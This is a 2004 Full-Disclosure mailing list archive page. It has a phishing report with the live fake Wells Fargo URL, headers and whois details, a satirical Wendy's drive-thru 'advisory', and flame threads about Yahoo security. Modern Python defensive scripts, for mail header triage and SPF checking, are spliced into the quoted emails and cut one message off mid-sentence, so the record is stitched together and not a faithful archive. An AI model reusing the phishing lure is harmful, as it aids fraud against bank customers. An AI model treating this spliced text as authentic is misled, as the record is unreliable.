Re: [Full-Disclosure] Your account at Wells Fargo has been suspended (Phishing Scam)

2004-07-07 Thread Szilveszter Adam
Hi,
[Since phishing seems to be all the rage today, I feel compelled to add...]
Babak Pasdar wrote:
We have uncovered a phishing scam.  This is a perfect example of a
phishing scam.  All indicators (that the recipient sees) show a valid and
legitimate e-mail from Wells Fargo.  This e-mail tells the user their
account has been frozen due to fraudulent activity and gives them a link
to go to.  However when you click on the link it takes you to a site in
Korea and not Wells Fargo:
...
Here is a quick assessment that confirms the e-mail is fraudulent.  In
the header notice the source sending it to igxglobal is not identifiable
via reverse DNS:
lots of info elided
Well, maybe it's just me, but to me, the *very* first reason to believe 
that the mail was a fraud would be, that I never, ever would expect my 
bank to send me such sensitive and time-critical information in an email 
message, which can be read by any party while in transit and be delayed 
for arbitrary amounts of time, or not delivered at all. (insert rant 
here about why more and more applications are relying on email and SMS 
messages as a timely and dependable communications mechanism, when 
clearly neither was designed to be either) How would they maintain the 
privacy of banking operations if they sent such messages to customers? 
Please, please US people tell me that even US banks are not so stupid as 
to do this... convenience is surely a trump, but not in banking... there 
I want security first of all.

P.S. Remember when we used to tell people "Never open messages claiming 
to be virus warnings or security patches from MS; they are never, ever 
going to send such things in email, only offer them through the web"? 
Well, the other day I received an email from MS Hungary (I was 
registered for several TechNet events in the past) about the 
worm-du-jour and how it is dangerous and how MS recommends applying 
the patch immediately. Dang. The only thing missing was the patch 
attached. This is why police say as long as criminals are people there 
is not going to be a perfect crime. Everybody gets lazy after a time.

Regards,
Sz.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-07 Thread Dave Horsfall
On Wed, 7 Jul 2004, joe wrote:

 Of course you had FORTRAN and COBOL as well but you couldn't do fun
 games in those.

You mean like Adventure?  I still have the original FORTRAN source for
that somewhere on a tape.

-- Dave



RE: [Full-Disclosure] IE Web Browser: Sitting Duck

2004-07-07 Thread bills.bitch
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

autoMSdelete

a whole lot of shit. Notice the anxiety displayed in the overwhelming
mapping of the circuit board. Er///bored.

Do you see the three prongs at the end of the adapter that fits into the
wall socket? Do you ?? Do You?? That as I have been explaining all this
time is so isolated from the Operating System that you're wrong and I
am right.

heh suckers,  I be Microsoft Joe, dolls from Mattel coming soon.  The
lace on my shoes proves my point. While tied together so far removed.
hehehehehehehe joe joe joe joe joe btw did i mention my last gig made
a wack of dough and bought multicolor laces plus a fifth of sangria and
puked my MVP .dlls' out. hint. I be jumpy so be you.
-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDrj40ACgkQ9hJzGKhH2LdYKQCghgxzNU5O6z+SSLMjZ8rDCxQNsIEA
nRSzuUx+PfIxeettpY2Fcs/pF+qi
=QfVo
-END PGP SIGNATURE-






[Full-Disclosure] Wendy's Drive-up Order System Information Disclosure

2004-07-07 Thread mi2g-research
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


- -- SIPS EXCERPT -- ADVISORY -- SIPS EXCERPT -- ADVISORY --

Wendy's Drive-up Order System Information Disclosure

Reporter: mi2g (http://www.mi2g.com/)
Date: July 07, 2004
Severity: Medium to High
Attack Class: Physical, Remote, Race Condition
Vendor: Wendy's (http://www.wendys.com/)


I. BACKGROUND

Wendy's International, Inc. is one of the world's largest
restaurant operating and franchising companies with more than
9,300 total restaurants and quality brands - Wendy's Old
Fashioned Hamburgers®, Tim Hortons® and Baja Fresh® Mexican
Grill. The Company invested in two additional quality brands
during 2002 - Cafe Express™ and Pasta Pomodoro®.

II. DESCRIPTION

Remote exploitation of the Wendy's Drive-up ordering system
allows an attacker to gain sensitive information about the
order of arbitrary customers.

During customer/vendor handshake, the customer vehicle
must come to a stop beside the vendor menu ordering system
which contains a large screen to display the current order.
During this process, adequate protection is not given to the
space between the vehicle and the menu allowing for a number
of remote attackers to obtain sensitive order information.

Once the victim has finished ordering, the information stays
available on the screen for up to several minutes or until
another customer has pulled forward. This creates a great
window for exploitation and increases the chance of winning
the race condition.

III. ANALYSIS

Successful exploitation allows unauthenticated remote malicious
arbitrary attackers to retrieve the contents of the previous
customer's food order which is a serious breach of confidentiality.

As proof of concept, this attack was carried out against mi2g
CEO DK Matai. It was disclosed that he ordered a grilled chicken
sandwich, large fries and a large Coca-Cola.

IV. DETECTION

mi2g has confirmed that all Wendy's with a Drive-up menu display
are affected. Other vendors may be affected but were not tested.

V. WORKAROUND

Use a hard object such as a rock or baseball bat to disable the
order display screen after the late night drive-thru has closed.

VI. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned
the name CAN-2004-2934 to this issue. This is a candidate for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

VII. DISCLOSURE TIMELINE

07/07/02   Exploit discovered by mi2g
07/08/02   mi2g clients (the Inner Sanctum) notified
01/08/03   The Queen notified
03/22/03   bespoke security architecture updated
09/01/03   mi2g clients notified again
07/07/04   Public Disclosure
07/08/04   Vendor notified

VIII. CREDIT

Rear Admiral John Hilton and Geoffrey Hancock are credited with
discovering this vulnerability.

IX. SPECIAL THANKS

Donny Werner for verifying Wendy's drive up systems are
not vulnerable to XSS issues!

X. LEGAL NOTICES

Copyright (c) 2004 mi2g Limited.

Permission is granted for the redistribution of this alert
electronically provided a small royalty is paid. It may not be
edited in any way without the express written consent of mi2g. If
you wish to reprint the whole or any part of this alert in any
other medium other than electronically, please email
[EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be
accurate at the time of publishing based on currently available
information. Use of the information constitutes acceptance for
use in an AS IS condition. There are no warranties with regard
to this information. Neither the author nor the publisher accepts
any liability for any direct, indirect, or consequential loss
or damage arising from use of, or reliance on, this information.

-BEGIN PGP SIGNATURE-
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDrk18ACgkQa74Q1wBemg8ZEACfTaxcsaq/mkOAWZ8A5TPRhM/gq8gA
n0pcaILhtSzHGnGbdBi1BCHQCi7s
=YRgk
-END PGP SIGNATURE-






Re: [Full-Disclosure] Yahoo!

2004-07-07 Thread System Outage
Heh.. Don't worry. I won't tell this list about the numerous cookie
exploits which led to thousands, probably millions of Yahoo!
accounts being compromised last year.

If only the media had picked up on it at the time. It would have been
a massive story for people like CNet News to run. Some things are meant
to be kept underground, I guess.

It's amazing the stuff that never makes it onto public security
mailing lists, and it seems like only the small issues are posted here
by security groups (for Yahoo! at least).

And about telling Yahoo! about issues. I've given up on that now. They
are ignorant people at the address [EMAIL PROTECTED] They only
care for themselves and have little public relations skill. They burnt
their bridges with me and now they'll suffer. They know I get hold of
a lot of information for Yahoo! and send it to them directly at
[EMAIL PROTECTED] or via other employees who send it to the
security team.

I've noticed also from past advisories on here by the big security
groups that Yahoo! Security seem to have a problem with public
relations and the lack of feedback they give people.

Anyway, it's not my problem anymore. They can find their own security
loopholes from now on. I'm finished with helping them out, as I have
done indirectly over the past 6 years and to [EMAIL PROTECTED]
directly for the last 1/2 years.

The script kiddies who hang on Yahoo! Chat will probably burn the
place down (and that's just the ones who claim to have carried out the
Akamai attack on Yahoo!), if they haven't managed to do so already.


Cheerio


On Tue, 6 Jul 2004 19:08:04 -0700 (PDT), VX Dude [EMAIL PROTECTED] wrote:
 --- System Outage [EMAIL PROTECTED] wrote:
  Yeah, i've contacted the Yahoo! Security Team over
  the past 1/2 years with various issues that they
  -did- follow up and patch, but did not once think to
  tell me about progress. It was only after I spoke to
  a representative of Yahoo! Security and said I was
  going to post all the underground security issues
  with Yahoo! to FD, that I received an e-mail to say
   sorry that we didn't contact you. We've been reading
   -all- mails and we've been taking further action(s),
  after all this time.
 
 snip
 
  I guess the same may apply for Google Security Team.
  After all, Yahoo! and Google were very good
  partners, up until recently. Google and Yahoo! seem
   to have very quickly become rivals, with regard to
   Search and E-mail.
 
  The things I could tell FD about Yahoo! would rock
   the Yahoo! Security Team to its foundations (and
  they know it). Luckily for them, I have morals.
 
  Yahoo! are aware of who I am, even though they know
  me on another alias.
 
 
  Cheerio
 
 snip
 
 I would just like to point out that some of us who use
 yahoo enjoy their security holes, if they didnt have
 such security holes we move on to using something like
 gmail!
 
 So please, stop telling yahoo, if they really cared,
 they'd do it on their own, and don't blab to FD
 either.  Why ruin everyone's fun for 2 inches of fame?
 
 PS: FD keep sending those viruses.  I don't know what
 the fuck it has to do for your cause, but it helps out
 my cause ;p
 




Re: [Full-Disclosure] Yahoo!

2004-07-07 Thread Geoffrey Huntley
OMG MY E-PENIS > YOUR E-PENIS.

Jesus christ.

On Wed, 7 Jul 2004 10:03:14 +0100, System Outage
[EMAIL PROTECTED] wrote:
 Heh.. Don't worry. I won't tell this list about the numerous cookie
 exploits which lead to thousands, probably millions of Yahoo!
 account's being compromised last year.
 
 If only the media had picked up on it at the time. It would have been
 a massive story for people like CNet News to run. Some things are ment
 to be kept underground, I guess.
 
 It's amazing the stuff that never makes it onto public security
 mailing lists, and it seem's like only the small issues are post here
 by security groups (for Yahoo! at least).
 
 And about telling Yahoo! about issues. I've given up on that now. They
 are ignorant people at the address [EMAIL PROTECTED] They only
 care for themselfs and have little public relation skills. They burnt
 there bridges with me and now they'll suffer. They know I get hold of
 alot of information for Yahoo! and send it to them directly at
 [EMAIL PROTECTED] or via other employee's who send it to the
 security team.
 
 I've noticed also from past advisories on here by the big security
 groups that Yahoo! Security seem to have a problem with public
 relations and the lack of feedback they give people.
 
 Anyway, it's not my problem anymore. They can find there own security
 loopholes from now on. I'm finished with helping them out, as I have
 done indirectly over the past 6 years and to [EMAIL PROTECTED]
 directly for the last 1/2 years.
 
 The script kiddies who hang on Yahoo! Chat will probably burn the
 place down (and that's just the ones who claim to have carried the out
 Akamia attack on Yahoo!), if they haven't managed to do so already.
 
 Cheerio
 
 On Tue, 6 Jul 2004 19:08:04 -0700 (PDT), VX Dude [EMAIL PROTECTED] wrote:
  --- System Outage [EMAIL PROTECTED] wrote:
   Yeah, i've contacted the Yahoo! Security Team over
   the past 1/2 years with various issues that they
   -did- follow up and patch, but did not once think to
   tell me about progress. It was only after I spoke to
   a representative of Yahoo! Security and said I was
   going to post all the underground security issues
   with Yahoo! to FD, that I received an e-mail to say
   sorry that we didn't contact you. We've been reading
   -all- mails are we've been taking further action(s),
   after all this time.
  
  snip
  
   I guess the same may apply for Google Security Team.
   After all, Yahoo! and Google were very good
   partners, up until recently. Google and Yahoo! seem
   to have very quickly become rivals, with regards of
   Search and  E-mail.
  
   The things I could tell FD about Yahoo! would rock
   the Yahoo! Security Team to it's foundations (and
   they know it). Luckily for them, I have morals.
  
   Yahoo! are aware of who I am, even though they know
   me on another alias.
  
  
   Cheerio
  
  snip
 
  I would just like to point out that some of us who use
  yahoo enjoy their security holes, if they didnt have
  such security holes we move on to using something like
  gmail!
 
  So please, stop telling yahoo, if they really cared,
  they'd do it on their own, and don't blab to FD
  either.  Why ruin everyone's fun for 2 inches of fame?
 
  PS: FD keep sending those viruses.  I don't know what
  the fuck it has to do for your cause, but it helps out
  my cause ;p
 
  __
  Do you Yahoo!?
  New and Improved Yahoo! Mail - 100MB free storage!
  http://promotions.yahoo.com/new_mail
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.netsys.com/full-disclosure-charter.html
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html




RE: [Full-Disclosure] Wendy's Drive-up Order System Information Disclosure

2004-07-07 Thread Sapheriel
oh shi-- 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
[EMAIL PROTECTED]
Sent: Wednesday, July 07, 2004 8:06 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [Full-Disclosure] Wendy's Drive-up Order System Information
Disclosure



[Full-Disclosure] Your account at Wells Fargo has been suspended (Phishing Scam)

2004-07-07 Thread Babak Pasdar




ATTENTION,

We have uncovered a phishing scam.  This is a perfect example of a
phishing scam.  All indicators (that the recipient sees) show a valid and
legitimate e-mail from Wells Fargo.  This e-mail tells the user their
account has been frozen due to fraudulent activity and gives them a link
to go to.  However when you click on the link it takes you to a site in
Korea and not Wells Fargo:

http://online_wellsfargo_com_account.rndsystems.co.kr:7301/wells.htm

If you click on the link, an exact model of the Wells Fargo web site is
replicated.  This is the exact type of issue we had success with in
working with the FBI which led to an arrest of an unsavory Russian
character.

There are no products to protect against phishing other than user
education and vigilance along with refining the current model for mail.

Babak



Here is a quick assessment that confirms the e-mail is fraudulent.  In
the header notice the source sending it to igxglobal is not identifiable
via reverse DNS:

Received:  from dns (unknown [211.238.157.101]) by
imgxs43.goimaginex.net (Postfix) with SMTP id 15105B0016 for
[EMAIL PROTECTED]; Tue,  6 Jul 2004 15:08:21 -0400 (EDT)


Further research shows that the contact for the network IP in question
is Kanghyun Lee out of Seoul, South Korea:

person:   KANGHYUN LEE
descr: 	  BUSYKOREA
descr: 	  , Guro 5(o)-dong , Guro-gu
descr: 	  SEOUL
descr: 	  152-055
country:  KR
phone: 	  +82-2-862-1780
e-mail:   [EMAIL PROTECTED]
nic-hdl:  KL512-KR
mnt-by:   MNT-KRNIC-AP


Further investigation on the web site shows the following owner:


Domain Name   : rndsystems.co.kr
Registrant: RD SYSTEMS
Registrant Address: Pusan Venture Bldg.#305 651-1 Eomgung-dong, Sasang-gu, Busan, Republic of Korea
Registrant Zip Code   : 617831
Administrative Contact(AC): Kang Young Gyun AC
E-Mail: [EMAIL PROTECTED]
AC Phone Number   : 0513261777
Registered Date   : 2002. 05. 17.
Last updated Date : 2003. 04. 24.
Expiration Date   : 2005. 05. 17.
Publishes : Y
Authorized Agency : I-NAMES(the I stands for Internet) Corporation (http://www.i-names.co.kr)
Primary Name Server   Host Name  : www.rndsystems.co.kr
   IP Address : 211.33.221.36

- KRNIC Whois Service -


Return-Path: [EMAIL PROTECTED]
Received: from groupware.igxglobal.com ([unix socket]) by groupware (Cyrus v2.1.16) with LMTP; Tue, 06 Jul 2004 15:08:31 -0400
Received: from dns (unknown [211.238.157.101]) by imgxs43.goimaginex.net (Postfix) with SMTP id 15105B0016 for [EMAIL PROTECTED]; Tue,  6 Jul 2004 15:08:21 -0400 (EDT)
From: Wells Fargo National Association [EMAIL PROTECTED]
To: Bpasdar [EMAIL PROTECTED]
Subject: Your account at Wells Fargo has been suspended
Date: Wed, 7 Jul 2004 03:59:20 +0900
Reply-To: Wells Fargo National Association [EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]
MIME-Version: 1.0
X-Priority: 3 (Normal)
Importance: Normal
X-Mailer: EM: 4.52.0.790
Content-Type: multipart/alternative; boundary=_PartID_337380760025388
X-Virus-Scanned: IGX Global Secure Mail Relay
X-Evolution-Source: imap://[EMAIL PROTECTED]:993/


-Forwarded Message-
From: Wells Fargo National Association [EMAIL PROTECTED]
To: Bpasdar [EMAIL PROTECTED]
Subject: Your account at Wells Fargo has been suspended
Date: Wed, 07 Jul 2004 03:59:20 +0900

Dear Wells Fargo account holder, 

We regret to inform you, that we had to block your Wells Fargo account
because we have been notified that your account may have been
compromised by outside parties.

Our terms and conditions you agreed to state that your account must
always be under your control or those you designate at all times. We
have noticed some activity related to your account that indicates that
other parties may have access and or control of your information in your
account.

These parties have in the past been involved with money laundering,
illegal drugs, terrorism and various Federal Title 18 violations. In
order that you may access your account we must verify your identity by
clicking on the link below.

Please be aware that until we can verify your identity 
no further access to your account will be allowed and we will have no
other liability for your account
or any transactions that may have occurred as a result of your failure
to reactivate your account as
instructed below.

Thank you for your time and consideration in this matter.

Please follow the link below and renew your account information

https://online.wellsfargo.com/cgi-bin/signon.cgi

Before you reactivate your account, all payments have been frozen, and you will not be able to use your
account in any way until we have verified your identity.



-- 

Babak Pasdar
Founder / Chief Technology  Information Security Officer
e-mail: [EMAIL PROTECTED]
phone:  201.498.0555 x2205
pgp fingerprint:  
F901 028B 7658 8621 3EF9 D505 BBF2 35F2 C922 B416

Get Daily 
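The two checks Babak runs above (the Postfix Received: line that records a sender with no reverse DNS, and the link text that shows a wellsfargo.com URL while the real target is under rndsystems.co.kr) can be automated. The following is an added example, not code from the original post: it parses the quoted headers, flags the `unknown` PTR slot and the unqualified HELO name, and compares the displayed link with the actual href. The header text is reconstructed from the post with a placeholder recipient where the archive redacted addresses; `registrable_domain` is a deliberately simplified stand-in for a Public Suffix List lookup, and the finding names and scoring are my own.

```python
"""Header and link triage for the phishing mail quoted above.
Added example: this is not code from the original post."""
import re
from email import message_from_string
from urllib.parse import urlsplit

# Reconstructed from the headers quoted in the post. The archive redacted the
# mailbox addresses, so a placeholder recipient stands in for them.
RAW_MESSAGE = (
    "Received: from groupware.igxglobal.com ([unix socket]) by groupware "
    "(Cyrus v2.1.16) with LMTP; Tue, 06 Jul 2004 15:08:31 -0400\n"
    "Received: from dns (unknown [211.238.157.101]) by imgxs43.goimaginex.net "
    "(Postfix) with SMTP id 15105B0016 for <recipient@example.invalid>; "
    "Tue,  6 Jul 2004 15:08:21 -0400 (EDT)\n"
    "Subject: Your account at Wells Fargo has been suspended\n"
    "Date: Wed, 7 Jul 2004 03:59:20 +0900\n"
    "\n"
    "Please follow the link below and renew your account information\n"
)
EDGE_MTA = "imgxs43.goimaginex.net"   # the relay we operate, per the headers
DISPLAYED_LINK = "https://online.wellsfargo.com/cgi-bin/signon.cgi"
ACTUAL_LINK = "http://online_wellsfargo_com_account.rndsystems.co.kr:7301/wells.htm"
BRAND = "wellsfargo"

# Postfix logs a hop as "from HELO (PTR [IP])" and writes "unknown" in the PTR
# slot when the reverse lookup fails, which is the clue the post points at.
HOP_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?P<ptr>[^\s\[]+)\s+\[(?P<ip>[\d.]+)\]\)")


def parse_hop(received):
    m = HOP_RE.search(received)
    if not m:
        return None
    hop = m.groupdict()
    hop["ptr_missing"] = hop["ptr"].lower() == "unknown"
    hop["helo_unqualified"] = "." not in hop["helo"]  # bare "dns", not an FQDN
    return hop


def external_hop(raw, edge=EDGE_MTA):
    """Return the hop recorded by our own edge MTA. Received: lines below that
    one were supplied by the sender and may be forged, so they are ignored."""
    msg = message_from_string(raw)
    for received in msg.get_all("Received", []):
        if re.search(r"\bby\s+" + re.escape(edge) + r"\b", received):
            return parse_hop(received)
    return None


def registrable_domain(host):
    """Simplified eTLD+1 (hypothetical helper): a two-letter ccTLD under a
    generic second label such as co/com/ne/or/ac counts as a three-label
    suffix. A real deployment would consult the Public Suffix List."""
    labels = host.lower().rstrip(".").split(".")
    if (len(labels) >= 3 and len(labels[-1]) == 2
            and labels[-2] in {"co", "com", "ne", "or", "ac", "net", "org"}):
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def link_findings(displayed, actual, brand=BRAND):
    """Compare the URL the victim sees with the href it really points at."""
    shown, real = urlsplit(displayed), urlsplit(actual)
    findings = []
    if registrable_domain(shown.hostname) != registrable_domain(real.hostname):
        findings.append("domain-mismatch")
    squashed = real.hostname.replace("_", "").replace("-", "")
    if brand in squashed and brand not in registrable_domain(real.hostname):
        findings.append("brand-in-subdomain")      # brand used as a bait label
    if "_" in real.hostname:
        findings.append("underscore-in-hostname")  # not a valid hostname label
    if real.port not in (None, 80, 443):
        findings.append("nonstandard-port")
    if shown.scheme == "https" and real.scheme != "https":
        findings.append("https-to-http")
    return findings


def triage(raw=RAW_MESSAGE, displayed=DISPLAYED_LINK, actual=ACTUAL_LINK):
    hop = external_hop(raw)
    if hop is None:
        return {"error": "no Received: line from our edge MTA"}
    link = link_findings(displayed, actual)
    return {
        "sender_ip": hop["ip"],
        "helo": hop["helo"],
        "reverse_dns_failed": hop["ptr_missing"],
        "link": link,
        "score": int(hop["ptr_missing"]) + int(hop["helo_unqualified"]) + len(link),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

Only the Received: line written by your own MTA (here imgxs43.goimaginex.net) is trustworthy; every line beneath it was supplied by the sender and can say anything, which is why `external_hop` looks for the hop our edge recorded instead of trusting the bottom-most header. A missing PTR on its own is weak evidence (plenty of legitimate small senders lack one), so it is scored alongside the link mismatch rather than used as a verdict by itself.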

RE: [Full-Disclosure] Wendy's Drive-up Order System Information D isclosure

2004-07-07 Thread Rob Keown
My understanding is that McDonalds is recommending the abandonment of
Wendy's as a late-night drive-thru and adoption of it as an alternative
eatery.

Wendy's is rapidly preparing a fix, which involves PGP PKI. You *will* have
to email your public key to Wendy's in order to submit or confirm your
order.

Lastly, as expected, it has been found that Wendy's utilizes a client-server
app, running on IIS 5.0, for its menuing. The menu display itself is IE 6.0
SP1 (of course)!

Rob


-Original Message-
From: Sapheriel [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, July 07, 2004 6:32 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Wendy's Drive-up Order System Information
Disclosure

oh shi-- 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
[EMAIL PROTECTED]
Sent: Wednesday, July 07, 2004 8:06 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [Full-Disclosure] Wendy's Drive-up Order System Information
Disclosure

*** PGP SIGNATURE VERIFICATION ***
*** Status:   Unknown Signature
*** Signer:   Unknown Key (0x005E9A0F)
*** Signed:   7/7/2004 2:08:31 AM
*** Verified: 7/7/2004 7:32:21 AM

RE: [Full-Disclosure] Your account at Wells Fargo has been suspended (Phishing Scam)

2004-07-07 Thread Larry Seltzer
There are no products to protect against phishing other than user
education and vigilance along with refining the current model for mail.

Sender ID would have blocked this because of the fraudulent From: header, even assuming
it wasn't blocked because of envelope problems.
 
This is yet another reason we need an SMTP authentication scheme in place, and not one
just based on envelope data.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.ziffdavis.com/seltzer
[EMAIL PROTECTED] 

 



From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Babak Pasdar
Sent: Wednesday, July 07, 2004 7:10 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Your account at Wells Fargo has been suspended (Phishing
Scam)


ATTENTION,

We have uncovered a phishing scam.  This is a perfect example of a
phishing scam.  All indicators (that the recipient sees) show a valid and
legitimate e-mail from Wells Fargo.  This e-mail tells the user their
account has been frozen due to fraudulent activity and gives them a link
to go to.  However when you click on the link it takes you to a site in
Korea and not Wells Fargo:

http://online_wellsfargo_com_account.rndsystems.co.kr:7301/wells.htm

If you click on the link, an exact model of the Wells Fargo web site is
replicated.  This is the exact type of issue we had success with in
working with the FBI which led to an arrest of an unsavory Russian
character.

There are no products to protect against phishing other than user
education and vigilance along with refining the current model for mail.

Babak



Here is a quick assessment that confirms the e-mail is fraudulent.  In
the header notice the source sending it to igxglobal is not identifiable
via reverse DNS:

Received:  from dns (unknown [211.238.157.101]) by
imgxs43.goimaginex.net (Postfix) with SMTP id 15105B0016 for
[EMAIL PROTECTED]; Tue,  6 Jul 2004 15:08:21 -0400 (EDT)


Further research shows that the contact for the network IP in question
is Kanghyun Lee out of Seoul, South Korea:

person:   KANGHYUN LEE
descr:    BUSYKOREA
descr:    , Guro 5(o)-dong , Guro-gu
descr:    SEOUL
descr:    152-055
country:  KR
phone:    +82-2-862-1780
e-mail:   [EMAIL PROTECTED]
nic-hdl:  KL512-KR
mnt-by:   MNT-KRNIC-AP


Further investigation on the web site shows the following owner:


Domain Name           : rndsystems.co.kr
Registrant            : RD SYSTEMS
Registrant Address    : Pusan Venture Bldg.#305 651-1 Eomgung-dong, Sasang-gu,
                        Busan, Republic of Korea
Registrant Zip Code   : 617831
Administrative Contact(AC): Kang Young Gyun AC
E-Mail                : [EMAIL PROTECTED]
AC Phone Number       : 0513261777
Registered Date       : 2002. 05. 17.
Last updated Date     : 2003. 04. 24.
Expiration Date       : 2005. 05. 17.
Publishes             : Y
Authorized Agency     : I-NAMES(the I stands for Internet) Corporation
                        (http://www.i-names.co.kr)
Primary Name Server   Host Name  : www.rndsystems.co.kr
                      IP Address : 211.33.221.36

- KRNIC Whois Service -


Return-Path: [EMAIL PROTECTED]
Received: from groupware.igxglobal.com ([unix socket]) by groupware (Cyrus v2.1.16) with LMTP; Tue, 06 Jul 2004 15:08:31 -0400
Received: from dns (unknown [211.238.157.101]) by imgxs43.goimaginex.net (Postfix) with SMTP id 15105B0016 for [EMAIL PROTECTED]; Tue,  6 Jul 2004 15:08:21 -0400 (EDT)
From: Wells Fargo National Association [EMAIL PROTECTED]
To: Bpasdar [EMAIL PROTECTED]
Subject: Your account at Wells Fargo has been suspended
Date: Wed, 7 Jul 2004 03:59:20 +0900
Reply-To: Wells Fargo National Association [EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]
MIME-Version: 1.0
X-Priority: 3 (Normal)
Importance: Normal
X-Mailer: EM: 4.52.0.790
Content-Type: multipart/alternative; boundary=_PartID_337380760025388
X-Virus-Scanned: IGX Global Secure Mail Relay
X-Evolution-Source: imap://[EMAIL PROTECTED]:993/


-Forwarded Message-
From: Wells Fargo National Association [EMAIL PROTECTED]
To: Bpasdar [EMAIL PROTECTED]
Subject: Your account at Wells Fargo has been suspended
Date: Wed, 07 Jul 2004 03:59:20 +0900

Dear Wells Fargo account holder, 

We regret to inform you, that we had to block your Wells Fargo account
because we have been notified that your account may have been
compromised by outside parties.

Our terms and conditions you agreed to state that your account must
always be under your control or those you designate at all times. We
have noticed some activity related to your account that indicates that
other parties may have access and or control of your information in your
account.

These parties have in the past been involved with money laundering,
illegal drugs, terrorism and various Federal Title 18 violations. In
order that you may access your account we must verify your identity by
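The header check in Babak's post and Larry Seltzer's point that Sender ID would have rejected the message on its fraudulent From: header, as an added example that is not code from either poster: a minimal SPF-style evaluator in Python. It takes the connecting IP from the first Received: header (211.238.157.101 in the headers quoted above), takes the domain of the From: header, and evaluates a constructed in-memory policy table that stands in for the DNS TXT lookup. The bank's real domain is not on this page, so bank.example and igxglobal.example are placeholders, and the two policy records are constructed, not real records. Real SPF (RFC 7208) evaluates the envelope MAIL FROM and Sender ID the Purported Responsible Address rather than the bare From: header, and this toy parses only the ip4 and all mechanisms.

```python
"""Minimal SPF-style sender check.  Added example; not code from the posts.

Given a raw message, find the IP that handed the message to the border MTA,
find the domain in the From: header, and evaluate a constructed policy for
that domain.  The policy table stands in for DNS; only ip4:/all mechanisms
and the four qualifiers are handled.
"""
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed policy table (assumption: stands in for DNS TXT records).
# bank.example is a placeholder for the bank's real domain, which is not on the page.
POLICY = {
    "bank.example": "v=spf1 ip4:192.0.2.0/24 -all",
    "rndsystems.co.kr": "v=spf1 +all",
}

# Constructed sample message.  The Received: line mirrors the one quoted in
# the post (unknown host, no reverse DNS, 211.238.157.101); addresses are placeholders.
SAMPLE = """Received: from dns (unknown [211.238.157.101]) by imgxs43.goimaginex.net (Postfix) with SMTP id 15105B0016 for <victim@igxglobal.example>; Tue,  6 Jul 2004 15:08:21 -0400 (EDT)
From: Wells Fargo National Association <service@bank.example>
To: Bpasdar <victim@igxglobal.example>
Subject: Your account at Wells Fargo has been suspended

Dear account holder,
"""

IP_IN_BRACKETS = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def connecting_ip(raw_message):
    """Client IP from the topmost Received: header that carries one.
    On a border MTA that is the peer that delivered the message; internal
    hops (the Cyrus LMTP hop in the quoted headers) carry no bracketed IP."""
    msg = message_from_string(raw_message)
    for received in msg.get_all("Received", []):
        match = IP_IN_BRACKETS.search(received)
        if match:
            return match.group(1)
    return None


def header_from_domain(raw_message):
    """Domain part of the From: header address, lower-cased."""
    _, addr = parseaddr(message_from_string(raw_message).get("From", ""))
    return addr.rpartition("@")[2].lower() or None


def spf_check(domain, ip, policies=POLICY):
    """Evaluate the domain's record for the client IP: pass/fail/softfail/neutral,
    or 'none' when the domain publishes no record."""
    record = policies.get(domain)
    if record is None or not record.startswith("v=spf1"):
        return "none"
    client = ipaddress.ip_address(ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        if term == "all":
            return QUALIFIERS[qualifier]
        if term.startswith("ip4:") and client in ipaddress.ip_network(term[4:], strict=False):
            return QUALIFIERS[qualifier]
    return "neutral"  # record exhausted without an 'all' term


def evaluate(raw_message, policies=POLICY):
    """Tie the pieces together; a border MTA would reject or tag on 'fail'."""
    ip = connecting_ip(raw_message)
    domain = header_from_domain(raw_message)
    result = spf_check(domain, ip, policies) if ip and domain else "none"
    return {"ip": ip, "domain": domain, "result": result}


if __name__ == "__main__":
    print(evaluate(SAMPLE))
```

Run as a script it prints the verdict for the embedded sample: the Korean host is not in bank.example's ip4 range, the record ends in -all, and the result is fail. The decision is made at SMTP time from the connecting IP, which the sender cannot forge the way it forged the From: and Reply-To: headers, which is the point of both posters' remarks about moving beyond envelope data and user education.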

Re: [Full-Disclosure] Yahoo!

2004-07-07 Thread System Outage
On Wed, 7 Jul 2004 19:54:59 +1000, Geoffrey Huntley [EMAIL PROTECTED] wrote:
 OMG MY E-PENIS  YOUR E-PENIS.
 
 Jesus christ.

Yahoo! spend very little time preventing security blunders from
happening. They would rather wait until the problem comes to them than
preventing the whole thing from ever happening. Take Yahoo! Messenger
